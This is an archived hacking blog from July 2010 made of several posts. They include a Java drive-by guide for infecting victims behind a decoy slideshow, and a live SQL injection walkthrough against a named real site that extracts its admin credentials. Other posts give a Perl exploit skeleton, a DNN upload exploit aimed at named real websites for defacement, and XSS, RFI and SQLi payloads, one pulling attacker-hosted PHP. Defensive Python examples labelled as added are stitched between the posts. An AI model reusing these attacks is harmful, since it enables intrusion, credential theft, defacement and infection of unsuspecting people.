Saturday, July 31, 2010

Black Hat: The Largest Hacker Conference 2010 Best 5 Takeaways

Black Hat, the largest and most visible hacker conference, is winding down in Las Vegas. It always brings a series of shocks and this year didn't disappoint. What did we learn this year?

1. Your money isn't safe - Researcher Barnaby Jack demonstrated how to hack automated teller machines (ATMs). He did it both by physically opening the machine and installing malware on it and by compromising it over the network. It turns out these machines, or at least some of them, aren't all that aggressively secured.

2. Your cell phone isn't safe - It was a bad week for mobile security. Project Carmen Sandiego showed that you don't have to be a phone company or government to find out who's using a particular cell phone number or where they are located. The security company Lookout revealed that Android wallpaper applications are needlessly gathering personal data. For years mobile malware has been just over the horizon, but it seems to be closer than ever to being a real problem. F-Secure's Mikko Hypponen was quoted as saying "Eventually, virus writers will realize it is easier to make money by infecting phones than it is by infecting computers."

3. Your electric service isn't safe - Jonathan Pollet, founder of Red Tiger Security, told Black Hat attendees of the weaknesses in Supervisory Control And Data Acquisition (SCADA) systems used in utilities like power companies to manage and monitor equipment. SCADA vendors and users are way behind IT generally when it comes to security. Vulnerabilities go unpatched for long periods. Unnecessary software, like chat clients, is used on critical systems, which are sometimes connected to the Internet. Pollet also warned of the weak security state of "smart meters" being rolled out all over the country.

4. Your home router isn't safe - A new trick found by researcher Craig Heffner makes it easier for attackers to gain usable access to your home network. Hacking into the router can be done in many ways, but once you're in it's hard to get an address on the internal network. Heffner showed a JavaScript hack that allows an attacker to use DNS rebinding to gain an internal address. There are mitigating measures you can take, but they're complex or inconvenient.

5. Black Hat itself isn't safe - For the first time this year, Black Hat made their sessions available through a video feed, using a 3rd party service, for a $395 fee. One subscriber realized that it was easy to trick the service into providing the videos for free. It's not a good thing to show weakness like this to the Black Hat crowd.

There was some good news at the show. To add on to their recent announcement of a sandbox architecture for Reader for Windows, Adobe announced that it will be joining in Microsoft's MAPP program to provide advance notice to security vendors of vulnerability disclosures. This should help users to protect themselves better.

XSSer Storm - Open Source Penetration testing tool

XSSer is an open source penetration testing tool that automates the process of detecting and exploiting XSS injections against different applications.

It contains several options to try to bypass certain filters, and various special techniques of code injection.

XSSer v0.6a aka "XSSer Storm!" supports these new features:
-g DORK               Process search engine dork results as target urls (ex: inurl:vulnerable.asp?id=)
--Ge=DORK_ENGINE      Search engine to use for dorking (scroogle, duck, altavista, bing)
-c CRAWLING           Crawl target hierarchy parameters (can be slow!)
--Cw=CRAWLING_WIDTH   Number of urls to visit when crawling
--Dfo                 Encodes fuzzing IP addresses in DWORD format


Friday, July 30, 2010

The New Java Drive-By - Now supports .jpg, .gif, and .png!

Notes
Listen up, if you get any errors then look at the bottom of this post before even thinking of posting!

Introduction

Welcome to my new Java Drive-By! This drive-by will allow you to be "legit". What do I mean by legit? Well, I mean that if you say "Come look at my sexy slideshow! *link to site*", they will go there and see a slideshow and go, okay! Now you have infected them, but are still playing with them. Good luck and please read this full post.


What You Need


Before we get started you will need to get Java JDK to compile your .java.
You will also need some pics of a hot ass girl, which can be found anywhere on the internet today. You will also need these files (all available here):

Update.java (Client)
-

This is the main thing that will transfer your virus to their computer.


Slide.java (Slideshow)
-

The slideshow will be the one to make you seem "legit".


maker.bat (Makes .jar & sig)
-

Maker.bat will convert the .java -> .class -> .jar & sig. This is meant to make your life easier.


index.html (Main Page)
-

When they visit your site this is what they will see. This html file is the key to putting it all together.


Java Error

Quote: 'javac' is not recognized as an internal or external command, operable program or batch file.

Easy fix. If you haven't already, download Java JDK. Once you have it installed, follow the steps provided below.

Step 1 - Go to Start > Control Panel > System > Advanced tab > Environment Variables > System variables > Path > Edit.


Step 2 - Add a ; at the very end followed by C:\Program Files\Java\JDK VERSION\bin.

Step 3 - Done. Now try it again.

FAQ


Q. Won't let me type, must be something wrong with the JDK I downloaded?
A. Just type the password; it won't show you typing it. It will just sit there blinking. It's okay, just type the password. If you can't get the password right, try 123456.

How to use SQL Injection? Best Online Tutorial for SQL Injection

I receive many emails on how to hack a website using SQL injection, so here is the hacking tutorial on it.
[NOTE: This is for educational purpose only.]

This is a practical tutorial...! As long as this .pk site is up!

So let's start. Here is the website on which this live testing was done: http://www.depo.org.pk

Try to Find variables passing to inner script...

http://www.depo.org.pk/index.php?a=newsdetail&id=1

Where &id= is variable passing values to sql

Check whether it is vulnerable or Not... Put ' in place of 1 as shown below

depo.org.pk/index.php?a=newsdetail&id='

If it shows an error, then we can apply SQLi on this URL. Now we need to determine the number of columns in the current table.

Increase the numbers until u get rid of 'The used SELECT statements have a different number of columns'.

+1
+1,2
+1,2,3
+1,2,3,4
+1,2,3,4,5
+1,2,3,4,5,6
+1,2,3,4,5,6,7
+1,2,3,4,5,6,7,8... ! Order to find columns... !

http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1
http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,2
http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,2,3
http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,2,3,4
http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,2,3,4,5
http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,2,3,4,5,6
http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,2,3,4,5,6,7
http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,2,3,4,5,6,7,8

Here we get no error.

Here, we used SQL Functions directly from browser.

http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,database(),version(),4,5,6,7,8

database:- depo
version:- 5.0.45-log

------------------------------------------------


user()
database()
version()
current_user()
load_file()
hex()
unhex()
char()
concat()
group_concat()

------------------------------------------------

Now, we need to know structure of victim's mysql database

NOTE: SQL stores each column and table information in another table called as 'information_schema'

Attach the SQL query '+from+information_schema.tables+where+table_schema=database()' at the end of the column numbers!

http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,2,3,4,5,6,7,8+from+information_schema.tables+where+table_schema=database()

Now, we want to fetch the table structure of the database named 'depo'!

http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,group_concat(table_name),3,4,5,6,7,8+from
+information_schema.tables+where+table_schema=database()

Table names

admin,feedback,ideas,inquiry,members_detail_page,
members_detail_page_pictures,news,newsletter,
org_prod_categories,organizations,orginquiry,pages,
product_categories,products,products_pictures,profile

Now, it's the columns' turn!

http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,group_concat(column_name),3,4,5,6,7,8
+from+information_schema.columns+where+table_schema=database()

Column names

id,login,password,id,name,
company,email,country,learnsite,
visits,content,graphics,loading,organization,
comments,date,id,fname,lname,nic,occupation,
designation,organization,address,
country,city,state,zip,phone,fax,email,website,
date,id,country,agency,telephone,fax,email,website,
demand,company,address,date,id,heading_one,
text_one,heading_two

It's time to fetch Id and password from Table Admin!

http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,group_concat%28login,0x3a,password%29,3,4,5,6,7,8
+from+admin

FOR EDUCATIONAL PURPOSES ONLY.
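
A defender's view of the requests above, as an added example that is not part of the original post: a Python scan of web access-log lines for the quote probe, the stepped UNION SELECT column counts and the information_schema queries this walkthrough produces. The log lines, client addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed access-log lines (common log format); addresses are documentation ranges.
SAMPLE_LOG = """\
198.51.100.4 - - [31/Jul/2010:10:00:00 +0000] "GET /index.php?a=newsdetail&id=1 HTTP/1.1" 200 5120
203.0.113.9 - - [31/Jul/2010:10:01:02 +0000] "GET /index.php?a=newsdetail&id=%27 HTTP/1.1" 200 312
203.0.113.9 - - [31/Jul/2010:10:01:30 +0000] "GET /index.php?a=newsdetail&id=-1+union+select+1 HTTP/1.1" 200 298
203.0.113.9 - - [31/Jul/2010:10:01:41 +0000] "GET /index.php?a=newsdetail&id=-1+union+select+1,2 HTTP/1.1" 200 298
203.0.113.9 - - [31/Jul/2010:10:01:55 +0000] "GET /index.php?a=newsdetail&id=-1+UNION+SELECT+1,database(),version() HTTP/1.1" 200 640
203.0.113.9 - - [31/Jul/2010:10:02:20 +0000] "GET /index.php?a=newsdetail&id=-1+union+select+1,group_concat%28table_name%29,3+from+information_schema.tables+where+table_schema=database%28%29 HTTP/1.1" 200 901
198.51.100.4 - - [31/Jul/2010:10:03:00 +0000] "GET /search.php?q=student+union+select+committee HTTP/1.1" 200 2048
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# Rules run against each *decoded* parameter value, so '+' and %xx encoding
# (as in the page's %28 / %29) do not hide the keywords.
RULES = [
    # A parameter whose whole value is a single quote: the error probe.
    ("quote_probe", re.compile(r"^['\"]$")),
    # UNION SELECT followed by a literal or a function call, so ordinary
    # phrases such as "student union select committee" are not flagged.
    ("union_select", re.compile(
        r"\bunion\s+(?:all\s+)?select\s+(?:\d|null\b|[a-z_]+\s*\()", re.I)),
    ("schema_enum", re.compile(r"\binformation_schema\.(?:tables|columns)\b", re.I)),
    ("sql_function", re.compile(
        r"\b(?:group_concat|concat|load_file|database|version|current_user|user)\s*\(", re.I)),
]

SELECT_LIST_RE = re.compile(
    r"\bunion\s+(?:all\s+)?select\s+(.*?)(?:\s+from\b|$)", re.I | re.S)


def union_width(value):
    """Count top-level columns in the UNION SELECT list (commas outside parentheses)."""
    match = SELECT_LIST_RE.search(value)
    if not match:
        return 0
    depth, width = 0, 1
    for ch in match.group(1):
        if ch == "(":
            depth += 1
        elif ch == ")":
            depth = max(0, depth - 1)
        elif ch == "," and depth == 0:
            width += 1
    return width


def inspect(target):
    """Return (matched rule names, UNION column counts) for one request target."""
    rules, widths = set(), set()
    query = urlsplit(target).query
    for _name, value in parse_qsl(query, keep_blank_values=True):
        matched = {rule for rule, pattern in RULES if pattern.search(value)}
        if "union_select" in matched:
            widths.add(union_width(value))
        rules |= matched
    return rules, widths


def scan(log_text):
    """Map client IP -> rules seen and the distinct UNION column counts it tried."""
    findings = {}
    for line in log_text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue
        rules, widths = inspect(match.group("target"))
        if rules:
            entry = findings.setdefault(match.group("ip"), {"rules": set(), "widths": set()})
            entry["rules"] |= rules
            entry["widths"] |= widths
    return {
        ip: {"rules": sorted(e["rules"]), "union_widths": sorted(e["widths"])}
        for ip, e in findings.items()
    }


if __name__ == "__main__":
    for ip, report in scan(SAMPLE_LOG).items():
        print(ip, report)
```

Several distinct values in union_widths from one client in a short window is the column-count stepping shown above and is a stronger signal than any single keyword hit.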

credit card hacking

Let's check it out:
http://www.fakenamegenerator.com/gen-random-us-ca.php

Thursday, July 29, 2010

Writing SQL Injection exploits in Perl

[1] Introduction
[2] Little panning of Perl language used into an internet context
[3] Perl SQL Injection by examples
[4] Gr33tz to all new and former visitors and …




—+— StArT
[1] Introduction
Perl can be considered a very powerful programming language if we think of the internet context. In fact we can perform a lot
of operations across the internet just by writing a little bit of code. So i decided to write a similar guide to make life
easier for everyone who decides to start writing a perl exploit.
There are a few requisites u need to proceed:
- U must know the basic operations of perl (print, chomp, while, die, if, etc etc…);
- U must know what kind of SQL code u need to inject to obtain a specific thing (stealing pwd, add new admin, etc etc…).
Now, we are ready to start…
[2] Little panning of Perl language used into an internet context
Using Perl code in an internet context means that u should be able to make a sort of dialog between your script and the
server side (or other..). To do this u need to use some "Perl modules".
Those modules must be put at the head of the script. In this tut we are going to use only the "IO::Socket" module, but
there are thousands, and if u are curious just search on cpan to retrieve info on every module.
[-] Using the IO::Socket module
Using this module is quite simple. To make the Perl interpreter able to use this module u must write at the start
of the script "use IO::Socket;". With this module u'll be able to connect to every server defined previously, using
a chomp, look at the example.
Example:
print "Insert the host to connect: ";
chomp ($host=<STDIN>);
Now suppose that the host inserted is www.host.com. We must declare to the interpreter that we want to connect to this
host. To do this, we must create a new sock that will be used by the interpreter to connect.
To create this we are going to write something like this:
$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80")
or die " ]+[ Connecting ... Can't connect to host.\n\n";
In this piece of code we have declared that the interpreter must use the "IO::Socket" module, creating a new
connection, through the TCP protocol, using port 80 and directed to the host specified in the chomp
($host=www.fbi.gov).
If connection is not possible an error message will appear ("Connecting ... Can't connect to host").
Resume:
- Proto=>TCP -------> The protocol to use (TCP/UDP)
- PeerAddr=> -------> The server/host to connect
- PeerPort=> -------> Port to use for the connection
Ok, now let's go to the next step, which is the real heart of this tut.
[3] Perl SQL Injection
Assuming that we know what kind of SQL statement must be injected, now we are going to see how to do this.
The SQL code must be treated like a normal variable (like "$injection").
Example:
$injection = "index.php/forum?=[SQL_CODE]";
This string means that we are going to inject the query into the "index.php/forum" path, following the correct syntax that
will bring us to cause a SQL Injection "?=".
Now we must create a piece of code that will inject this query into the vulnerable host.
print $sock "GET $injection HTTP/1.1\n";
print $sock "Accept: */*\n";
print $sock "User-Agent: Hacker\n";
print $sock "Host: $host\n";
print $sock "Connection: close\n\n";
This piece of code is the most important one into the building of an exploit.
It can be considered the “validation” of the connection.
In this case the “print” command doesn’t show anything on screen, but it creates a dialogue and sends commands to the host.
In the first line the script will send a “GET” to the selected page defined into “$injection”.
In the third line it tells to the host “who/what” is making the request of “GET”. In this case this is Hacker, but it
can be “Mozilla/5.0 Firefox/1.0.4″ or other.
In the fourth line it defines the host to connect to, “$host”.
With the execution of this script we have made our injection.
Resume of the exploit:
use IO::Socket;
print "Insert the host to connect: ";
chomp ($host=<STDIN>);
$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80")
or die " ]+[ Connecting ... Can't connect to host.\n\n";
$injection = "index.php/forum?=[SQL_CODE]";
print $sock "GET $injection HTTP/1.1\n";
print $sock "Accept: */*\n";
print $sock "User-Agent: Hacker\n";
print $sock "Host: $host\n";
print $sock "Connection: close\n\n";
close ($sock); #this line terminates the connection
A little trick:
Assuming that, with the execution of SQL Inj, u want to retrieve a MD5 Hash PWD, u must be able to recognize it.
Additionally, u want that your script will show the PWD on your screen.
Well, to make this, the next piece of code, could be one of the possible solutions.
while($answer = <$sock>) {
if ($answer =~ /([0-9a-f]{32})/) {
print "]+[ Found! The hash is: $1\n";
exit(); }
}
This string means that if the answer of the host shows a "word" made of 32 characters ("0" to "9" and "a" to "f"),
this word must be considered the MD5 Hash PWD and it must be shown on screen.
Conclusions:
The method showed in this tut is only one of the 10000 existing, but, for me, this is the most complete one.
U could use also the module “LWP::Simple” in the place of “IO::Socket”, but u should change something into the code.
This method can be used also, not only for SQL Injection, but, for example, remote file upload or other.

Wednesday, July 28, 2010

Learn How to hack websites Using DNN [Dot Net Nuke] Exploit

Hack Website Using DNN [Dot Net Nuke] Exploit

Using google DORK try to find the vulnerable website.

inurl:"/portals/0"

You can also modify this google dork according to your need & requirement

I have found these 2 website vulnerable to this attack:

http://www.wittur.se/
http://www.bsd405.org/

n00bs can also try both of these websites for testing purpose.

Open the home page and check any image which is located in /portals/0/
Check the location of the image. It should be located in /portals/0/

For e.g. in case of http://www.wittur.se ..the image is located at location- http://www.wittur.se/Portals/0/SHM.jpg

Waaooo it means this website is vulnerable and we can change the front page pic. Now the current image name is SHM.jpg. Rename the new image as SHM.jpg which you want to upload as a proof of you owned the system.

Now here is the exploit

Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

HOW TO RUN ?

Simply copy paste it as shown below:

www.site.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

You will see the portal where it will ask you to upload. Select the third option, File (A File On Your Site).

After selecting the third option, replace the URL bar with the script below:

javascript:__doPostBack('ctlURL$cmdUpload','')

After running this JavaScript, you will see the option for Upload Selected File. Now select your image file which you have renamed as SHM.jpg & upload here. Go to main page and refresh...THAT'S IT, you have hacked the website.





Tuesday, July 27, 2010

What is XSS (Cross-Site Scripting)

This vulnerability allows for an attacker's input to be sent to unsuspecting victims. The primary usage for this vulnerability is cookie stealing; if an attacker steals your cookie, they can log into whatever site they stole your cookie from under your account (usually, and assuming you were logged in at the time.)
Example Vulnerable Code - search.php (PHP)

PHP Code:

<?php
$s = $_GET['search'];
// a real search engine would do some database stuff here
echo("You searched for $s. There were no results found");
?>
Testing Inputs For Vulnerability
For this, we test by throwing some HTML into the search engine, such as "XSS". If the site is vulnerable to XSS, you will see something like this: XSS, else, it's not vulnerable.

Example Exploit Code (Redirect)
Because we're mean, we want to redirect the victim to goatse (don't look that up if you don't know what it is) by tricking them into clicking on a link pointed to "search.php?search=
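
The fix for the search.php pattern above, as an added Python example that is not from the original post (PHP's counterpart to the escaping call is htmlspecialchars()): encode the search term before it reaches the HTML, and mark the session cookie HttpOnly so that page script cannot read it. The page template, the cookie name "session", the probe string and the function names are assumptions.

```python
import html
from http.cookies import SimpleCookie

# Assumed page template: the search term is reflected in two places,
# inside a quoted attribute and inside element text.
PAGE = """<form action="search.php"><input name="search" value="{term}"></form>
<p>You searched for {term}. There were no results found</p>"""

# Constructed harmless probe: breaks out of the attribute, then opens a tag.
PROBE = '"><script>alert(1)</script>'


def render_vulnerable(search):
    """Same flaw as the page's search.php: raw input is placed into the HTML."""
    return PAGE.format(term=search)


def render_safe(search):
    """Encode &, <, >, double and single quotes, which covers both element
    text and quoted attribute values. Other contexts (inline script, URLs)
    need their own encoders and are not handled here."""
    return PAGE.format(term=html.escape(search, quote=True))


def session_cookie(token):
    """Build a Set-Cookie value that script on the page cannot read."""
    cookie = SimpleCookie()
    cookie["session"] = token
    cookie["session"]["path"] = "/"
    cookie["session"]["httponly"] = True      # hidden from document.cookie
    cookie["session"]["secure"] = True        # only sent over HTTPS
    cookie["session"]["samesite"] = "Strict"  # not sent on cross-site requests
    return cookie["session"].OutputString()


def response_headers(token):
    """Headers to send with the page; the CSP is a second layer that stops
    injected inline script from running if an encoding step is ever missed."""
    return [
        ("Content-Type", "text/html; charset=utf-8"),
        ("Content-Security-Policy", "default-src 'self'"),
        ("Set-Cookie", session_cookie(token)),
    ]


if __name__ == "__main__":
    print(render_vulnerable(PROBE))
    print(render_safe(PROBE))
    for name, value in response_headers("constructed-token"):
        print(f"{name}: {value}")
```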

What is RFI/LFI (Remote/Local File Include)

Description
This vulnerability allows the user to include a remote or local file, and have it parsed and executed on the local server.
Example Vulnerable Code - index.php (PHP)



PHP Code:
<?php
$page = $_GET['p'];
if (isset($page)) {
    include($page);
} else {
    include("home.php");
}
?>

Testing Inputs For Vulnerability
Try visiting "index.php?p=http://www.google.com/"; if you see Google, it is vulnerable to RFI and consequently LFI. If you don't, it's not vulnerable to RFI, but it still may be vulnerable to LFI. Assuming the server is running *nix, try viewing "index.php?p=/etc/passwd"; if you see the passwd file, it's vulnerable to LFI; else, it's not vulnerable to RFI or LFI.
Example Exploit
Let's say the target is vulnerable to RFI and we upload the following PHP code to our server

PHP Code:
<?php
unlink("index.php");
system("echo Hacked > index.php");
?>
and then we view "index.php?p=http://our.site.com/malicious.php", then our malicious code will be run on their server, and by doing so, their site will simply say 'Hacked' now.
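
One way to close the include hole above, as an added Python example rather than code from the original post: the `p` parameter is treated as a page name from a fixed set, never as a path, and the resolved file must still sit inside the pages directory. The page names, directory layout and function names are assumptions.

```python
import os
import tempfile
from pathlib import Path

# Assumed set of pages the site actually serves.
ALLOWED_PAGES = {"home", "news", "contact"}


class PageNotAllowed(ValueError):
    """Raised when ?p= does not name a page that may be included."""


def resolve_page(param, pages_dir):
    """Return the file to include for ?p=<param>, or raise PageNotAllowed.

    The parameter is only ever compared against ALLOWED_PAGES, so URLs,
    absolute paths and ../ sequences never reach the filesystem.
    """
    name = param or "home"          # missing parameter falls back to home.php
    if name not in ALLOWED_PAGES:
        raise PageNotAllowed(name)

    base = Path(pages_dir).resolve()
    candidate = (base / f"{name}.php").resolve()

    # Second layer: after symlinks are resolved the file must still live
    # under the pages directory, and must be a regular file.
    if base not in candidate.parents or not candidate.is_file():
        raise PageNotAllowed(name)
    return candidate


def demo():
    """Run the inputs from the text (plus a symlink case) against a temp site."""
    with tempfile.TemporaryDirectory() as root:
        pages = Path(root, "pages")
        pages.mkdir()
        (pages / "home.php").write_text("home")
        (pages / "news.php").write_text("news")
        secret = Path(root, "secret.txt")
        secret.write_text("constructed secret")
        # An allowed name that points outside the pages directory.
        os.symlink(secret, pages / "contact.php")

        results = {}
        for param in ["", "news", "http://www.google.com/", "/etc/passwd",
                      "../secret.txt", "contact"]:
            try:
                results[param] = resolve_page(param, pages).name
            except PageNotAllowed:
                results[param] = "rejected"
        return results


if __name__ == "__main__":
    for param, outcome in demo().items():
        print(repr(param), "->", outcome)
```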

What is SQL Injection?

SQL Injection

What is SQL?

SQL stands for Structured Query Language, a language that can communicate with a database.
SQL injection is the act of injecting your own, custom-crafted SQL commands into a web-script so that you can manipulate the database any way you want. Some example usages of SQL injection: Bypass login verification, add new admin account, lift passwords, lift credit-card details, etc.; you can access anything that's in the database.
 
Example Vulnerable Code - login.php (PHP/MySQL)
Here's an example of a vulnerable login code
PHP CODE

<?php
$user = $_POST['u'];
$pass = $_POST['p'];

if (!isset($user) || !isset($pass)) {
    echo("");
} else {
    // User input is concatenated straight into the query (the vulnerability)
    $sql = "SELECT `IP` FROM `users` WHERE `username`='$user' AND `password`='$pass'";
    $ret = mysql_query($sql);
    $ret = mysql_fetch_array($ret);
    if ($ret[0] != "") {
        echo("Welcome, $user.");
    } else {
        echo("Incorrect login details.");
    }
}
?>

Basically what this code does is take the username and password input, and take the user's IP from the database in order to check the validity of the username/password combo.

Testing Inputs For Vulnerability
 
Just throw an "'" into the inputs, and see if it outputs an error; if so, it's probably injectable. If it doesn't display anything, it might be injectable, and if it is, you will be dealing with blind SQL injection which anyone can tell you is no fun. Else, it's not injectable.

The Example Exploit
 
Let's say we know the admin's username is Administrator and we want into his account. Since the code doesn't filter our input, we can insert anything we want into the statement, and just let ourselves in. To do this, we would simply put "Administrator" in the username box, and "' OR 1=1--" into the password box; the resulting SQL query to be run against the database would be "SELECT `IP` FROM `users` WHERE `username`='Administrator' AND `password`='' OR 1=1--'". Because of the "OR 1=1", it will have the ability to ignore the password requirement, because as we all know, the logic of "OR" only requires one question to result in true for it to succeed, and since 1 always equals 1, it works; the "--" is the 'comment out' character for SQL which means it ignores everything after it, otherwise the last "'" would ruin the syntax, and just cause the query to fail.
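
The login check above beside a parameterized version, as an added Python example (not the original post's code) that uses an in-memory SQLite database in place of PHP and MySQL. The table contents, the function names and the choice of PBKDF2 for password storage are assumptions made for the demonstration.

```python
import hashlib
import hmac
import os
import sqlite3

PBKDF2_ROUNDS = 100_000  # assumed work factor for the demonstration


def hash_password(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)


def make_db():
    """Constructed users table. The plaintext column exists only so the
    vulnerable query from the page can run; the safe path never reads it."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT,"
        " salt BLOB, pw_hash BLOB, IP TEXT)"
    )
    salt = os.urandom(16)
    db.execute(
        "INSERT INTO users VALUES (?, ?, ?, ?, ?)",
        ("Administrator", "s3cret-constructed", salt,
         hash_password("s3cret-constructed", salt), "192.0.2.10"),
    )
    return db


def login_vulnerable(db, user, password):
    """Same construction as the page's login.php: input is pasted into the SQL
    text, so a quote in either field changes the statement itself."""
    sql = (
        f"SELECT IP FROM users WHERE username='{user}' AND password='{password}'"
    )
    row = db.execute(sql).fetchone()
    return row is not None and row[0] != ""


def login_safe(db, user, password):
    """Bound parameter plus a hash comparison done in application code.

    The username travels as data next to the statement, so quotes, OR and --
    inside it are just characters in a string. The password never enters SQL.
    """
    row = db.execute(
        "SELECT salt, pw_hash FROM users WHERE username = ?", (user,)
    ).fetchone()
    if row is None:
        # Do the same amount of work for unknown users.
        hash_password(password, b"\x00" * 16)
        return False
    salt, stored = row
    return hmac.compare_digest(hash_password(password, salt), stored)


if __name__ == "__main__":
    db = make_db()
    attempts = [
        ("Administrator", "s3cret-constructed"),
        ("Administrator", "wrong"),
        ("Administrator", "' OR 1=1--"),   # the input discussed in the text
    ]
    for user, password in attempts:
        print(repr(password),
              "vulnerable:", login_vulnerable(db, user, password),
              "safe:", login_safe(db, user, password))
```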

The Basics of Hacking

I will be writing about the basics of hacking servers; I will cover how to scan and/or exploit vulnerable daemons (services) running on the target server, and how to discover and/or exploit web-script vulnerabilities. You will need to know your way around a computer before reading this. And if you don't know what a word means, Google or Wiki it!; if you don't understand a concept, post here and I will try to clarify. Thanks for reading, hope this helps.

Tools Required:
Port Scanner - nmap - http://nmap.org/
Worlds No1 Browser - FireFox - http://firefox.com/



Daemon Vulnerabilities:
Description

Daemons (also commonly known as services) are the processes that run on a computer that allow it to do things such as serve pages with the HTTP protocol, etc. (although they do not always necessarily interact over a network). Sometimes these daemons are poorly coded, which allows for an attacker to send some sort of input to them, and they either crash, or in worse cases, they run any code the attacker chooses.
Scanning For Vulnerabilities

Well, this is where a little common sense comes in, because we need to answer one question: Which ports to scan? Well, with a little googling, we'd know that the default port for the HTTPD (web daemon) is 80, for the FTPD it's 21, etc. So if we wanted to know the version of the HTTPD running on the server, we'd run "nmap targetsite.com -p 80 -sV". NOTICE the -sV argument; it is vital, otherwise nmap will just return whether or not the port is open, and won't provide us with the daemon's version. This is great and all, but we don't want to just scan one port at a time, do we? Well, nmap has us covered there, so just scan multiple ports by separating each target port with a comma (,) like so: "nmap targetsite.com -p 21,80 -sV". However, if you don't mind the scan taking a while longer, you can scan a range of ports like so: "nmap targetsite.com -p 1-1000 -sV". This will scan all ports between 1 and 1000.

Checking For Vulnerability

After your scan has finished, nmap will display the open ports on your target, along with their version (if they were identifiable, usually they are). An example return would look like this: "80/tcp open http Apache httpd 2.0.32". Taking this information, we search on milw0rm for "Apache". After skimming through the results, we see that the target is vulnerable to this vulnerability, which when run on the target server will make it crash.

Using the Exploits
This varies, depending on the language that the exploit is coded in; google on how to do this, since it would just be wasting my time to explain how to use all of the different languages here.

Common Web-Script Vulnerabilities
Description
In this section, I will be writing about vulnerabilities in a webserver's server-sided code. Here are the topics I will be covering:
  • SQL Injection
  • XSS (Cross-Site Scripting)
  • RFI/LFI (Remote/Local File Include)

Sunday, July 25, 2010

Download Best Hacking Videos Taken From milw0rm.com




  • Rooting SQL Server via SQL Injection by gsy
  • Aircrack-ptw by FBi
  • Hacking Mac OS X – A Case Study by skillTube
  • Hacking SQL in Linux
  • using the SecureState Swiss Army Knife by rel1k
  • LSO: MSFweb 3.0 part 2 by ChrisG
  • The dangers of Ad-Hoc networks in Windows XP SP2 by rel1k
  • Classical Basic Local Buffer Overflow by UniquE-Key
  • How To Founding Win32 Stack Overflow Exploit by pang0
  • Cursed Animations from teh Wi1d W3st by muts
  • Windows Shellcode by Xnuxer Research
  • faking wep using linux wifislax by Komtec1
  • Clientless WEP Cracking (fragmentation attack using the air crack suite) by muts
  • Local JPG shell Inclusion (LFI using php injected JPG) by Codebreak
  • XSS injection in image formats // Taking advantages on it by diwou
  • CA BrightStor ARCserve Backup Remote Heap Overflow Vulnerability by LSsecurity
  • Quicktime Media 0day Exploit Video by ZoNe_VoRTeX
  • [Win32] Learn Stack Overflow Exploitation – Part 2 by Aelphaeis Mangarae
  • Cracking the Bluetooth Pin and Link key by Thierry Zoller
  • RealVNC V4.1.1 Bypass Authentication Exploit Video by r0t0r00t3r
  • VNC Authentication Bypass Vulnerability Video by CwG GeNiuS
  • Metasploit 3 Video (msfconsole with db_autopwn) by nnp
  • Ettercap Video by Yugal.ras
  • A Small Rooting Video by SeventotheSeven
  • [Win32] Learn Stack Overflow Exploitation – Part 1 by Aelphaeis Mangarae
  • Attack on Windows Systems based on the ActiveX Vulnerability by Michal Bucko
  • MSF-eXploit Builder in Action by Athias
  • How to Exploit Stack Base Buffer Overrun Under Windows XP SP2 by Omega7
  • Dns Spoofing by Febranio
  • Terminal Server / RDP Cracking by ChrisG
  • MS-SQL Exploitation Video by
  • RealVNC 4.1 Authentication Bypass using Metasploit Framework by ChrisG
  • Exploiting Microsoft RPC DCOM using Metasploit Framework by ChrisG
  • Webmin File Disclosure Demo by pseudo
  • WMF + SWF Exploit by ZoNe_VoRTeX
  • Cross Site scripting HQ 0 Day by fUSiON
  • Windows Server Rooting (Remote Desktop Connection) by Chironex Fleckeri
  • 0-DAY Simple SQL Injection by x128
  • Intruders D-Link Wireless Access Point Configuration Disclosure by diesl0w
  • vBulletin XSS Demonstration with Session Hijacking by splices
  • CRLF (Carriage Return and Line Feed) Injection Demonstration by Paisterist
  • PHP Remote File Inclusion / Windows Backdoor by WiLdBoY
  • Heap Overflow Basics (Spanish) by Paisterist
  • (WBB Portal) Cross-Site scripting Using Unsanitized jpg File by Tontonq
  • Multiple Websites Embedded SWF File Vulnerability Demonstration by Shadow
  • Simple ASP Administrator SQL Injection by (ruiner_zer0) by ruiner_zer0
  • JPortal CMS SQL Injection Exploit in Action by (ruiner_zer0) by ruiner_zer0
  • phpBB Session Handling Authentication Bypass Demonstration by ruiner_zer0
  • JSP 1 or 1 SQL Injection Demonstration by (ruiner_zer0) by ruiner_zer0
  • Demonstration of Blind MySQL Injection (bsqlbf) by aramosf
  • Demonstration of Blind MySQL Injection (mysql_bftools) by reversing
  • KF Hacking up Bluetooth with his WIDCOMM Code by Kevin Finisterre
  • Tunneling Exploits Through SSH (whoppix) by muts
  • Cracking WEP in 10 Minutes (kismac) by Oliver Greiter
  • Muts Showing WMF 0day in Action (metasploit) by muts
  • Reverse Engineering with LD_PRELOAD by Qnix
  • Qnix Demonstrating Exploration of Simple Buffer Overflows by Qnix
  • Cracking WEP in 10 Minutes (whoppix) by muts

Monday, July 19, 2010

Game Boost 1.7.5.2010 | 6.54 MB


